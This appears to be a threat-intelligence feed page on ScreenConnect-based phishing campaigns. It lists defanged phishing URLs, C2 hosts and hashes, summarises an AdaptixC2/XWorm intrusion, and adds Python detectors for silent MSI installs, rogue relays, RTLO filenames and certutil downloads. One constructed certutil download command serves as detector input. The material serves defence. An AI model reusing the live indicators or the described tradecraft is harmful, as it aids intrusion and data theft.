⚠️Observed phishing URLs delivering RMM payload:
RMM: ScreenConnect
Theme: DocuSign
URL: hxxps://docsonlineshare.shorepowersolution[.]net/docusign/d0cs/
MSI Download URL: hxxps://docsonlineshare.shorepowersolution[.]net/docusign/d0cs/Windows/download/index.php
SHA256: 160c4e5bd3f09c53a09e5fc95c34cf9fc2e96525e72412645350ba27a7025b34
#ThreatIntel #Phishing #RMM
New analysis reveals Rock, a single developer operating The Quarry MaaS/PhaaS ecosystem since April 2025, enabling up to 200 affiliates to run tax-themed phishing campaigns targeting US 🇺🇸 organizations with legitimate RMM tools.

Key technical details:
• Modular toolkit includes VBS droppers with UAC bypass, self-hosted ScreenConnect panels, Rocky Gmail Sender mass mailer, and PowerShell exfiltration scripts
• Three VBS variants: Base64, hex-encoded GitLab loader, PowerShell AES decryption to evade static analysis
• Legitimate signed RMM software (ScreenConnect, Tiflux, Datto) used as final payload, not modified malware
• Adspect cloaking filters researchers while serving fake SSA/IRS portals to victims
• Telegram-based C2 for real-time victim logging and exfiltration (T1071.001)

Attack chain methodology:
• Bulk emails with tax lures → Adspect filtering → spoofed government portals → RMM payload delivery via de.php
• VBS path: self-elevation → parallel RMM decoy PDF download → silent install with /quiet ALLUSERS=2 → cleanup
• Post-exploitation includes browser history theft and W-2 document finder targeting financial data

90% of victims are in the US 🇺🇸, across SaaS (17.4%), Healthcare (15.8%), Media (14.7%), Finance (11.1%) sectors. Arabic comments in code suggest developer origin, but affiliates span multiple regions. #DFIR_Radar
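The VBS-to-msiexec chain and the self-hosted ScreenConnect panels described in the post above are what a detection engineer has to catch on the endpoint, because the final payload is a legitimately signed installer that no hash or signer check will flag. The Python below is an added example written for this page, not code from the report or from the DFIR_Radar post. It runs two rules over constructed process-creation events (Sysmon Event ID 1 fields, simplified): rule one flags a silent msiexec install (/quiet or /qn) whose MSI sits in a user-writable path or comes straight from a URL, and records whether ALLUSERS=2 and a script-host parent (wscript, cscript, mshta, PowerShell) were present; rule two extracts the relay host from a ScreenConnect client launch string and flags any relay that is not on an allowlist. The launch-string layout (relay host in h=, port in p=), the approved-relay set, and every path, host and key fragment in the sample events are assumptions or fabrications for the example, not indicators from the report.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 fields, simplified).
# All paths, hosts and key material are fabricated for this example; none are IOCs.
SAMPLE_EVENTS = [
    {  # VBS dropper -> silent per-machine install of an MSI from the user's temp dir
        "Image": r"C:\Windows\System32\msiexec.exe",
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r'msiexec.exe /i "C:\Users\alice\AppData\Local\Temp\DocusignSetup.msi" /quiet ALLUSERS=2',
    },
    {  # benign: software deployment from the SCCM cache, must not fire
        "Image": r"C:\Windows\System32\msiexec.exe",
        "ParentImage": r"C:\Windows\CCM\Ccm32BitLauncher.exe",
        "CommandLine": r'msiexec.exe /i "C:\Windows\ccmcache\1a\agent.msi" /qn ALLUSERS=1',
    },
    {  # ScreenConnect client pointed at a relay the organisation does not own
        "Image": r"C:\Program Files (x86)\ScreenConnect Client (a1b2c3d4)\ScreenConnect.ClientService.exe",
        "ParentImage": r"C:\Windows\System32\services.exe",
        "CommandLine": r'"C:\Program Files (x86)\ScreenConnect Client (a1b2c3d4)\ScreenConnect.ClientService.exe" '
                       r'"?e=Access&y=Guest&h=relay.fakehelpdesk.invalid&p=8041&k=BgIAAACkAABSU0Ex"',
    },
    {  # ScreenConnect client on the approved corporate relay, must not fire
        "Image": r"C:\Program Files (x86)\ScreenConnect Client (e5f60718)\ScreenConnect.ClientService.exe",
        "ParentImage": r"C:\Windows\System32\services.exe",
        "CommandLine": r'"C:\Program Files (x86)\ScreenConnect Client (e5f60718)\ScreenConnect.ClientService.exe" '
                       r'"?e=Access&y=Guest&h=support.corp.example&p=443&k=BgIAAACkAABSU0Ex"',
    },
]

# Assumption: the only ScreenConnect relay this organisation sanctions.
APPROVED_RELAYS = {"support.corp.example"}

# Locations a phished user can write to without elevation.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(?:AppData|Downloads|Desktop|Documents)\\|\\Temp\\|\\ProgramData\\", re.I)
# "/i <package>" with or without quotes around the package path.
MSI_INSTALL = re.compile(r'/i\s+(?:"(?P<q>[^"]+\.msi)"|(?P<u>\S+\.msi))', re.I)
SILENT_SWITCH = re.compile(r"/(?:quiet|qn|qb!?)\b", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe"}

# Assumed ScreenConnect launch-string layout: relay host in h=, relay port in p=.
SC_RELAY = re.compile(r"[?&]h=(?P<host>[A-Za-z0-9.\-]+)")
SC_PORT = re.compile(r"[?&]p=(?P<port>\d+)")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(events, approved_relays):
    """Return one finding per event that matches either rule, in event order."""
    findings = []
    for ev in events:
        image = basename(ev["Image"])
        parent = basename(ev.get("ParentImage", ""))
        cmd = ev["CommandLine"]

        if image == "msiexec.exe":
            m = MSI_INSTALL.search(cmd)
            if m and SILENT_SWITCH.search(cmd):
                msi = m.group("q") or m.group("u")
                untrusted = USER_WRITABLE.search(msi) or re.match(r"https?://", msi, re.I)
                if untrusted:
                    findings.append({
                        "rule": "silent_msi_untrusted_source",
                        "msi": msi,
                        # ALLUSERS=2 = per-machine install if elevated, the switch seen in the VBS path
                        "per_machine": bool(re.search(r"\bALLUSERS=2\b", cmd, re.I)),
                        "script_parent": parent in SCRIPT_HOSTS,
                    })

        elif image.startswith("screenconnect.client"):
            h = SC_RELAY.search(cmd)
            if h and h.group("host").lower() not in approved_relays:
                p = SC_PORT.search(cmd)
                findings.append({
                    "rule": "screenconnect_unapproved_relay",
                    "relay": h.group("host"),
                    "port": p.group("port") if p else None,
                })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS, APPROVED_RELAYS):
        print(finding)
```

The relay allowlist is the part that does the work: a signed ScreenConnect client is indistinguishable from the helpdesk's own until you look at where it phones home, so the rule should be fed from asset inventory rather than from a static set as in the example.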
Jun 8
⚠️Observed phishing URLs delivering RMM payload:
RMM: ScreenConnect
Theme: DocuSign
URL: hxxps://muunpolicy[.]com
File Download URL: hxxps://github[.]com/lonergigs-code/DocuSign/releases/download/V1.9.1/DocusignSetup.exe
C2 domain: rbbytati25iy2.anondns[.]net:8041
SHA256: 60f104030a7e6fc47d5ce7c286c5172e9f835a09b5a560350ac71d0c25f8c187
File Signer: "Paula Foster"
More domains - pastebin.com/Baf7XHtL
#ThreatIntel #Phishing #RMM
An operator conducted a five‑day, SSA-themed phishing intrusion using AdaptixC2 with XWorm and dual ScreenConnect clients for persistence and control, exfiltrating via Telegram and targeting a large Active Directory network. blog.deception.pro/blog/xwor…
Microsoft exposes a cryptojacking campaign using SEO poisoning and ScreenConnect to target high-performance PCs, with malicious sites also surfaced through AI chatbots. The post From poisoned search results to GPU minin... f.mtr.cool/njgcgjxhtw
Replying to @malwrhunterteam
again screenconnect
#threatreport #HighCompleteness [Op Report] From SSA Phish to AdaptixC2: A Multi-RAT Intrusion | 11-06-2026
Source: blog.deception.pro/blog/xwor…
Key details below ↓
💀Threats: Adaptixc2_tool, Xworm_rat, Screenconnect_tool, Right-to-left_override_technique, Typosquatting_technique, Phantom_stealer, Pingcastle_tool, Mimikatz_tool, Tinba, Spear-phishing_technique, Credential_dumping_technique
🎯Victims: Healthcare
🏭Industry: Healthcare
🌐Geo: United States, Poland
📚TTPs: ⚔️Tactics: 3 🛠️Techniques: 9
🧨IOCs:
- Domain: 9
- File: 15
- IP: 3
- Url: 10
- Hash: 5
- Path: 3
- Registry: 2
- Command: 2
💽Software: WordPress, Active Directory, Telegram, Windows Powershell
🔢Algorithms: sha256, zip
🔠Functions: RPC
📜Programming Languages: php, powershell
💻Platforms: x86

#threatreport: In mid-May 2026, a sophisticated commodity intrusion was executed using a multi-layered approach involving malware and remote access tools within a Microsoft Active Directory environment in the healthcare sector. The attack process began with a well-crafted phishing email impersonating the Social Security Administration (SSA), which included a link to a RAR archive hosted on a compromised WordPress site. This archive contained a PE32 executable disguised as a PDF using a right-to-left override (RTLO) filename trick, allowing it to evade detection. The attacker used AdaptixC2 as the primary command-and-control (C2) infrastructure, employing additional tools such as XWorm for redundant access and Telegram for exfiltration, alongside two independent instances of ScreenConnect for interactive control. Initial compromise involved the phishing email leading to the delivery of a malicious DLL (jli.dll), which was dropped in the user's public documents. The operator subsequently used the Windows certutil command to download AdaptixC2 components from a specified URL, facilitating the establishment of persistence and further payloads.
Over the engagement, multiple Staging variants of AdaptixC2 were launched, exhibiting beaconing behavior to specific IP addresses through HTTPS. Utilizing TLS inspection provided insights into the C2 traffic, revealing the actual URLs and beacons in plaintext, contributing to effective attribution of the activity. The reconnaissance phase involved mapping out the domain using SAMR and LSAD, allowing the attacker to gather detailed information about domain users, groups, and trust relationships, crucial for lateral movement. The primary C2 framework, AdaptixC2, exhibited a distinctive beaconing pattern characterized by specific HTTP POST requests to endpoints such as /updates/check.php. XWorm, deployed as a DLL, provided additional access capabilities and utilized Telegram’s Bot API for exfiltration, indicating a well-defined operational methodology. Meanwhile, ScreenConnect offered interactive access with resilience through deployment across multiple domains, complicating attempts to sever attacker access. Given the complexity of the attack, it reflects an adaptive intrusion strategy where initial access relies on social engineering rather than advanced technical exploits. The use of RTLO to disguise executables remains a reliable tactic to bypass user vigilance, while the presence of non-detectable hashes for the payload in VirusTotal emphasizes the need for behavioral detection and network monitoring rather than reliance on conventional file hash fingerprints. This case underscores the importance of vigilant monitoring for legitimate tools being exploited as part of malicious campaigns, particularly focusing on certificate utilities, persistence mechanisms, and C2 behavior linked to known malware families.
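Two of the tradecraft points in the report summary above, the RTLO filename trick and certutil used as a downloader, are cheap to check mechanically, and the summary's own conclusion (hashes were clean on VirusTotal, so detect behaviour instead) is the reason to do so. The Python below is an added example written for this page; it is not code from the report or from deception.pro. analyze_filename() strips Unicode bidi control characters from a name, approximates what a file manager would show after a U+202E override (the text following the override is rendered right-to-left, i.e. reversed), and flags a mismatch between the extension the user sees and the extension Windows will honour; certutil_download() picks the URL and destination out of a certutil -urlcache command line. The sample filename and the download URL are constructed; the only value borrowed from the report is the jli.dll drop name in the public Documents folder.

```python
import re

# Unicode bidi controls. U+202E (RIGHT-TO-LEFT OVERRIDE) is the one that makes
# "SSA_Statement_<RLO>fdp.exe" render as "SSA_Statement_exe.pdf" in Explorer.
RTLO = "\u202e"
BIDI_CONTROLS = set("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069")


def _strip_controls(s: str) -> str:
    return "".join(ch for ch in s if ch not in BIDI_CONTROLS)


def analyze_filename(name: str) -> dict:
    """Compare the extension a user sees with the extension the OS will use."""
    real = _strip_controls(name)
    if RTLO in name:
        head, tail = name.split(RTLO, 1)
        # Approximation of the rendering: everything after the override is laid
        # out right-to-left, so a simple ASCII tail appears reversed on screen.
        displayed = _strip_controls(head) + _strip_controls(tail)[::-1]
    else:
        displayed = real
    real_ext = real.rsplit(".", 1)[-1].lower() if "." in real else ""
    shown_ext = displayed.rsplit(".", 1)[-1].lower() if "." in displayed else ""
    return {
        "real_name": real,
        "displayed_name": displayed,
        "real_ext": real_ext,
        "displayed_ext": shown_ext,
        "bidi_controls": sum(ch in BIDI_CONTROLS for ch in name),
        # Any bidi control in a filename is odd; a control plus an extension
        # mismatch is the RTLO trick.
        "suspicious": any(ch in BIDI_CONTROLS for ch in name) and real_ext != shown_ext,
    }


def certutil_download(cmdline: str):
    """Return {url, dest, split} for a 'certutil -urlcache ... -f <url> <dest>' line, else None."""
    toks = cmdline.split()
    if not toks:
        return None
    exe = toks[0].strip('"').rsplit("\\", 1)[-1].lower()
    if exe not in ("certutil", "certutil.exe"):
        return None
    # certutil accepts both -flag and /flag spellings.
    flags = {t.lstrip("-/").lower() for t in toks[1:] if t[:1] in "-/"}
    if "urlcache" not in flags:
        return None
    url_idx = next((i for i, t in enumerate(toks)
                    if re.match(r"(?:https?|ftp)://", t, re.I)), None)
    if url_idx is None:
        return None
    dest = toks[url_idx + 1] if url_idx + 1 < len(toks) else None
    return {"url": toks[url_idx], "dest": dest, "split": "split" in flags}


if __name__ == "__main__":
    # Constructed samples: an RTLO-disguised executable and a certutil fetch
    # dropping into the public Documents folder named in the report.
    print(analyze_filename("SSA_Statement_\u202efdp.exe"))
    print(certutil_download(
        r"certutil.exe -urlcache -split -f https://cdn.example.invalid/u/stage.bin "
        r"C:\Users\Public\Documents\jli.dll"))
```

The filename check belongs at the mail gateway and in archive-extraction hooks, where the name is still under your control; the certutil rule is a process-creation detection, and should be paired with the same treatment of `certutil -decode`, which the report's chain did not need but which is the other half of the LOLBin.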
Jun 8
⚠️Observed phishing URLs delivering RMM payload:
RMM: ScreenConnect
Theme: DocuSign
URL: hxxps://regulatory-review[.]com
File Download URL: hxxps://store-eu-par-5.gofile[.]io/download/direct/ec98a359-3803-4da2-b8c8-b6479c7e45b5
C2 domain: hitpanel[.]top:8041
SHA256: 24bc3936ae9054ab66ace68d6b23ca3e8853ebb7239c32651d36c93459d51793
File Signer: "Palacios Edgar"
#ThreatIntel #Phishing #RMM
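The three "Observed phishing URLs delivering RMM payload" posts on this page use the usual defanging (hxxps, [.]) so the indicators cannot be clicked by accident, which also means they cannot be pasted into a proxy-log search or an EDR hash query as-is. The Python below is an added example written for this page, not code from any of the posters: refang() reverses the common defang conventions and extract_iocs() pulls URLs, hostnames, host:port C2 pairs and SHA256 hashes out of the text into lookup-ready form. The sample post is constructed in the same shape as the posts above, with .invalid hostnames and a dummy hash; no live indicator from the page is embedded, and the code only normalizes strings, it never fetches anything.

```python
import re
from urllib.parse import urlsplit

# Constructed sample in the shape of the #ThreatIntel #RMM posts on this page.
# Every indicator is fabricated (.invalid TLD, dummy hash); nothing here is live.
SAMPLE_POST = (
    "Observed phishing URLs delivering RMM payload: RMM: ScreenConnect Theme: DocuSign "
    "URL: hxxps://docs-share[.]example[.]invalid/docusign/ "
    "File Download URL: hxxps://files[.]example[.]invalid/download/DocusignSetup.exe "
    "C2 domain: relay01[.]example[.]invalid:8041 "
    "SHA256: " + "ab" * 32 + ' File Signer: "Example Signer" #ThreatIntel #Phishing #RMM'
)

# Defang conventions seen in the wild, undone in order.
DEFANG_RULES = [
    (re.compile(r"\bhxxps?\b", re.I), lambda m: "https" if m.group(0).lower().endswith("s") else "http"),
    (re.compile(r"\[\.\]|\(\.\)|\{\.\}| dot ", re.I), lambda m: "."),
    (re.compile(r"\[:\]"), lambda m: ":"),
    (re.compile(r"\[@\]"), lambda m: "@"),
]

URL_RE = re.compile(r"\bhttps?://[^\s\"'<>]+", re.I)
SHA256_RE = re.compile(r"\b[0-9a-fA-F]{64}\b")
# bare host:port pairs such as a C2 relay, not preceded by a URL scheme
HOSTPORT_RE = re.compile(r"(?<![/\w.-])((?:[a-z0-9-]+\.)+[a-z]{2,63}):(\d{1,5})\b", re.I)


def refang(text: str) -> str:
    """Turn hxxps://a[.]b[.]invalid into https://a.b.invalid (string work only, no network)."""
    for pattern, repl in DEFANG_RULES:
        text = pattern.sub(repl, text)
    return text


def extract_iocs(post: str) -> dict:
    """Refang a post and return sorted URLs, hostnames, host:port C2 pairs and SHA256 hashes."""
    text = refang(post)
    urls = sorted({u.rstrip(".,);") for u in URL_RE.findall(text)})
    domains = {urlsplit(u).hostname for u in urls}
    c2 = sorted({(h.lower(), int(p)) for h, p in HOSTPORT_RE.findall(text)})
    domains |= {h for h, _ in c2}
    hashes = sorted({h.lower() for h in SHA256_RE.findall(text)})
    return {
        "urls": urls,
        "domains": sorted(d for d in domains if d),
        "c2": c2,
        "sha256": hashes,
    }


if __name__ == "__main__":
    for kind, values in extract_iocs(SAMPLE_POST).items():
        print(kind, values)
```

Keep the refanged output inside your tooling (SIEM lookups, blocklist imports); the defanged form exists so a human reading a feed does not end up visiting the URL, and re-posting the refanged version defeats that.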
Replying to @pry_loc
ScreenConnect virus, B.E.C, Office365, C.T.W
#XWorm #AdaptixC2 #ScreenConnect I have been working with @malbeacon and the deception.pro platform. Here's a write up of a recent deception operation👇 blog.deception.pro/blog/xwor…